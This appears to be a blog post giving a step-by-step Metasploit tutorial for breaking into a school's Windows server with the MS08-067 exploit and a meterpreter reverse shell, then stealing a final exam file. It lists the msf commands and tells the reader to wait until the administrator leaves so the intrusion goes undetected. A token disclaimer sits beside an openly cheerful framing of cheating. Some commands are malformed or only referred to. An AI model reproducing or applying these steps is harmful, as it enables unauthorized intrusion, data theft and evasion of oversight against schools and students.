So for today, we’ll look at how to break into your school’s server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!
WARNING (DISCLAIMER):
Of course, this is for demonstration/entertainment purposes only. Please do not break into your school’s server and steal exams as it’s illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.
STEP 1 FIND THAT PROPER EXPLOIT
Those of you with experience with Metasploit, or have followed my
previous Metasploit tutorials , know that one of my favorite exploits is the
RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.
In our case here, our school is running a Windows 2003 Server that stores all the department’s exams and records. So, let’s use the /exploit/windows/smb/ms08_067_netapi . To find it, type:
Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:
msf > use /exploit/windows/smb/ms08_067_netapi
STEP 2 SET THE PAYLOAD
Now we need to set our payload. In this case, we’ll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp .
msf > set payload /windows/meterpreter/reverse_tcp
Let’s take a look next at the options that we need for this exploit/payload combination by typing:
STEP 3 SET THE OPTIONS
Now we can see that we need to set the RHOST and the LHOST.
msf >set LHOST 192.168.1.114
msf >set RHOST192.168.1.108
STEP 4 EXPLOIT THAT SERVER!
Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.
STEP 5 CHECK TO SEE IF THE ADMIN IS USING THE SYSTEM
We should now have a meterpreter shell on the school’s server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.
As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let’s wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!
Once we’re safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like
ls, cd , pwd , and others, so let’s type
lpwd (both
pwd and
lpwd will work).
Meterpreter responds with the
/ symbol indicating that we’re in the
root directory .
STEP 6 FIND THE FINAL EXAMS
We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity . That’s probably where the exams are! Let’s change directories to Concord University:
meterpreter c:\\ConcordUniversity
Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.
Now we’re in ConcordUniversity, we can get a directory listing by typing:
We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we’re looking for the Biology final, let’s navigate to the Biology directory.
Voilà! There’s the final exam for our biology class.
STEP 7 DOWNLOAD THE FINAL
Meterpreter has a built-in download feature, so all we need to do is type:
meterpreter > download C:\\biology\exams\FinalExam
We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.
When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!
Comments
Post a Comment